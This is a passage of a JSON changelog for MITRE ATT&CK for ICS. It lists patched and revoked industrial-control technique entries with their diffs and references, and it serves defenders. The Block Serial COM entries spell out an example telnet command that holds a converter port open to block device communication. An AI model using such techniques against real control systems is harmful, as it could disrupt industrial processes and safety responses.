                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0766: Detection of Project File Infection"
                        ],
                        "new": [],
                        "dropped": []
                    }
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-23 19:39:03.420000+00:00",
                    "name": "Remote System Discovery",
                    "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used.(Citation: Enterprise ATT&CK January 2018)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0846",
                            "external_id": "T0846"
                        },
                        {
                            "source_name": "Enterprise ATT&CK January 2018",
                            "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ",
                            "url": "https://attack.mitre.org/wiki/Technique/T1018"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 19:39:03.420000+00:00\", \"old_value\": \"2025-04-16 21:26:18.958000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used.(Citation: Enterprise ATT&CK January 2018)\", \"old_value\": \"Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to210__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to210__0\"><a href=\"#difflib_chg_to210__top\">t</a></td><td class=\"diff_header\" id=\"from210_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;get&nbsp;a&nbsp;listing&nbsp;of&nbsp;other&nbsp;systems&nbsp;by</td><td class=\"diff_next\"><a href=\"#difflib_chg_to210__top\">t</a></td><td class=\"diff_header\" id=\"to210_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;get&nbsp;a&nbsp;listing&nbsp;of&nbsp;other&nbsp;systems&nbsp;by</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;IP&nbsp;address,&nbsp;hostname,&nbsp;or&nbsp;other&nbsp;logical&nbsp;identifier&nbsp;on&nbsp;a&nbsp;netw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;IP&nbsp;address,&nbsp;hostname,&nbsp;or&nbsp;other&nbsp;logical&nbsp;identifier&nbsp;on&nbsp;a&nbsp;netw</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ork&nbsp;that&nbsp;may&nbsp;be&nbsp;used&nbsp;for&nbsp;subsequent&nbsp;Lateral&nbsp;Movement&nbsp;or&nbsp;Disc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ork&nbsp;that&nbsp;may&nbsp;be&nbsp;used&nbsp;for&nbsp;subsequent&nbsp;Lateral&nbsp;Movement&nbsp;or&nbsp;Disc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">overy&nbsp;techniques.&nbsp;Functionality&nbsp;could&nbsp;exist&nbsp;within&nbsp;adversary</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">overy&nbsp;techniques.&nbsp;Functionality&nbsp;could&nbsp;exist&nbsp;within&nbsp;adversary</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;tools&nbsp;to&nbsp;enable&nbsp;this,&nbsp;but&nbsp;utilities&nbsp;available&nbsp;on&nbsp;the&nbsp;operat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;tools&nbsp;to&nbsp;enable&nbsp;this,&nbsp;but&nbsp;utilities&nbsp;available&nbsp;on&nbsp;the&nbsp;operat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;system&nbsp;or&nbsp;vendor&nbsp;software&nbsp;could&nbsp;also&nbsp;be&nbsp;used.<span class=\"diff_sub\">&nbsp;</span>(Citation:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;system&nbsp;or&nbsp;vendor&nbsp;software&nbsp;could&nbsp;also&nbsp;be&nbsp;used.(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Enterprise&nbsp;ATT&amp;CK&nbsp;January&nbsp;2018)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Enterprise&nbsp;ATT&amp;CK&nbsp;January&nbsp;2018)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M0814: Static Network Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0739: Detection of Remote System Discovery"
                        ],
                        "new": [],
                        "dropped": []
                    }
                }
            ],
            "revocations": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:37.791000+00:00",
                    "name": "Block Command Message",
                    "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)  (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0803",
                            "external_id": "T0803"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:37.791000+00:00\", \"old_value\": \"2025-04-15 19:58:01.218000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--15ca2a99-2d3e-457f-b1d7-c52a1d5849c9",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:16.029000+00:00",
                        "modified": "2026-04-23 18:50:42.389000+00:00",
                        "name": "Command Message",
                        "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "inhibit-response-function"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1691/001",
                                "external_id": "T1691.001"
                            },
                            {
                                "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                                "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                                "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                            },
                            {
                                "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                                "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                                "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:39.117000+00:00",
                    "name": "Block Reporting Message",
                    "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)  (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0804",
                            "external_id": "T0804"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                            "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                            "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:39.117000+00:00\", \"old_value\": \"2025-04-16 21:26:13.771000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--7866bb5f-98ee-45c2-984c-8a328c5176b2",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:16.584000+00:00",
                        "modified": "2026-04-23 18:52:34.062000+00:00",
                        "name": "Reporting Message",
                        "description": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.\n\nBlocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "inhibit-response-function"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1691/002",
                                "external_id": "T1691.002"
                            },
                            {
                                "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                                "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                                "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                            },
                            {
                                "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016",
                                "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ",
                                "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:51.323000+00:00",
                    "name": "Block Serial COM",
                    "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0805",
                            "external_id": "T0805"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:51.323000+00:00\", \"old_value\": \"2025-04-16 21:26:10.923000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--55e7e5c1-3760-4451-bae0-e79b29f452c5",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:22.399000+00:00",
                        "modified": "2026-04-23 19:59:10.079000+00:00",
                        "name": "Serial COM",
                        "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages.\n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "inhibit-response-function"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1695/001",
                                "external_id": "T1695.001"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:48.356000+00:00",
                    "name": "Default Credentials",
                    "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0812",
                            "external_id": "T0812"
                        },
                        {
                            "source_name": "Keith Stouffer May 2015",
                            "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:48.356000+00:00\", \"old_value\": \"2025-04-16 21:26:16.206000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--5658ad88-7510-490e-a351-95d50b1bcd91",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:19.020000+00:00",
                        "modified": "2026-04-23 19:30:36.158000+00:00",
                        "name": "Default Credentials",
                        "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed.(Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "persistence"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "lateral-movement"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1694/001",
                                "external_id": "T1694.001"
                            },
                            {
                                "source_name": "Keith Stouffer May 2015",
                                "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ",
                                "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-09-29 13:35:38.589000+00:00",
                    "modified": "2026-04-20 20:58:49.917000+00:00",
                    "name": "Hardcoded Credentials",
                    "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "lateral-movement"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0891",
                            "external_id": "T0891"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Aagam Shah, @neutrinoguy, ABB"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:49.917000+00:00\", \"old_value\": \"2025-04-16 21:26:18.583000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--6b335943-c3af-430e-a135-ab09623bdc20",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:19.528000+00:00",
                        "modified": "2026-04-23 19:32:38.851000+00:00",
                        "name": "Hardcoded Credentials",
                        "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset.(Citation: ICS-ALERT-13-164-01)(Citation: OT IceFall)\n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets.",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "persistence"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "lateral-movement"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1694/002",
                                "external_id": "T1694.002"
                            },
                            {
                                "source_name": "ICS-ALERT-13-164-01",
                                "description": "Cybersecurity and Infrastructure Security Agency (CISA). (2013, October 29). Medical Devices Hard-Coded Passwords. Retrieved April 23, 2026.",
                                "url": "https://www.cisa.gov/news-events/ics-alerts/ics-alert-13-164-01"
                            },
                            {
                                "source_name": "OT IceFall",
                                "description": "Forescout Vedere Labs. (2022, June). OT: IceFall Report. Retrieved April 23, 2026.",
                                "url": "https://www.forescout.com/resources/ot-icefall-report/"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
